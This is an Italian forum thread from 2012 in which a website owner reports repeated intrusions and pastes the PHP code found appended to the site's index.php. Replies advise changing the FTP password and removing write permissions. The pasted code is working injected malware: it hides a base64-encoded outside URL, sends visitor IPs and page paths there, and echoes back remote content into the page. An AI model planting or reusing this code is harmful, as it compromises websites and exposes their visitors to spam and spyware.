| fmsReVo https://www.fmsrevo.it/forum_old/ |
|
| continue intrusioni nel sito. https://www.fmsrevo.it/forum_old/viewtopic.php?f=3&t=1749 |
Pagina 1 di 1 |
| Autore: | Rayz [ 15/03/2012, 18:37 ] |
| Oggetto del messaggio: | continue intrusioni nel sito. |
Ciao a tutti. Non so se è mai capitato anche a voi, ma a me ultimamente sta snervando. Il problema è questo.. carico il sito correttamente, funziona.. ma poi di punto in bianco cerco di accedere e mi propina schermata bianca. Per correggere di solito mi basta sovrascrivere il file index.php, ma altre volte devo ricaricare tutto. Aprendo il file ho visto che si piazza del codice che non dovrebbe esserci in fondo al file (allego sotto). Non capisco se è un problema solo mio o succede a qualcun'altro. Come posso risolvere? Premetto che non ci faccio nulla, ho caricato il sito ad inizio campionato, fatto gli aggiornamenti correttamente e carico con FTP SOLO i file dei risultati in JS. Grazie a tutti, Rayz <?php if (!isset($sRetry)) { global $sRetry; $sRetry = 1; // This code use for global bot statistic $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot $stCurlHandle = NULL; $stCurlLink = ""; if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes { if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics $stCurlLink = base64_decode( 'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']); $stCurlHandle = curl_init( $stCurlLink ); } } if ( $stCurlHandle !== NULL ) { curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1); $sResult = @curl_exec($stCurlHandle); if ($sResult[0]=="O") {$sResult[0]=" "; echo $sResult; // Statistic code end } curl_close($stCurlHandle); } } ?> |
|
| Autore: | eL Pitu iL PuFFo [ 15/03/2012, 18:39 ] |
| Oggetto del messaggio: | Re: continue intrusioni nel sito. |
Prova a cambiare passwrod per l'accesso FTP! |
|
| Autore: | Rayz [ 15/03/2012, 18:49 ] |
| Oggetto del messaggio: | Re: continue intrusioni nel sito. |
Faccio una prova, nel caso mi faccio risentire. Grazie mille intanto. Rayz |
|
| Autore: | puffin [ 15/03/2012, 18:56 ] |
| Oggetto del messaggio: | Re: continue intrusioni nel sito. |
Rayz ha scritto: Faccio una prova, nel caso mi faccio risentire. Grazie mille intanto. Rayz Indirizzo del sito? Da quanto te lo fa? Dalla prima volta che l'hai installato? Solo recentemente? Che host è? |
|
| Autore: | Rayz [ 15/03/2012, 19:32 ] |
| Oggetto del messaggio: | Re: continue intrusioni nel sito. |
Rayzxiii.altervista.org Me lo fa calcola dai primi di gennaio...di punto in bianco! |
|
| Autore: | puffin [ 15/03/2012, 19:59 ] |
| Oggetto del messaggio: | Re: continue intrusioni nel sito. |
Rayz ha scritto: Rayzxiii.altervista.org Me lo fa calcola dai primi di gennaio...di punto in bianco! Ma che permessi di scrittura hanno i file nella tua root? Devono essere 664. |
|
| Autore: | Rayz [ 26/03/2012, 19:15 ] |
| Oggetto del messaggio: | Re: continue intrusioni nel sito. |
come faccio a vederlo? Ho cambiato password (una complessa) per l'accesso al sito (ftp) xò non è cambiato nulla...spam anche oggi. Rayz |
|
| Autore: | puffin [ 27/03/2012, 8:58 ] |
| Oggetto del messaggio: | Re: continue intrusioni nel sito. |
Rayz ha scritto: come faccio a vederlo? Ho cambiato password (una complessa) per l'accesso al sito (ftp) xò non è cambiato nulla...spam anche oggi. Rayz C'è un altro metodo... Togli tutti i permessi di scrittura ai file nella root. Vai con filezilla, selezioni i files della root e con il tasto destro, proprietà, togli tutte le spunte dalle cartelle "scrittura". L'unico inconveniente di questo metodo è che, il giorno che vorrai aggiornare revo, dovrai riassegnare i permessi attuali altrimenti l'aggiornamento non funzionerà. Mi spiace ma se non sappiamo da che parte entrano per spammare non possiamo rimediare. P.s.: Considera che a me è successo più volte su cms wordpress... per cui se passano "attraverso" lo sviluppatissiomo e collaudatissimo Wordpress.... |
|
| Autore: | Rayz [ 27/03/2012, 10:30 ] |
| Oggetto del messaggio: | Re: continue intrusioni nel sito. |
Ti ringrazio molto. L'inconveniente dell'aggiornamento è minimo dai, mi basta non dover ogni 3 giorni andare li e verificare che il sito non abbia "cose" che partono in java ed installano spyware, e riuppare i file puliti.  Ho tolto i parametri di scrittura sul file INDEX.PHP visto che mi entrano sempre e solo sul principale (SPY del cavolo  )... male che vada, se mi modificano altre pagine del sito, cambio i parametri anche sugli altri file.Grazie ancora. Rayz 
|
|
| Pagina 1 di 1 | Tutti gli orari sono UTC + 1 ora [ ora legale ] |
| Powered by phpBB® Forum Software © phpBB Group http://www.phpbb.com/ |
|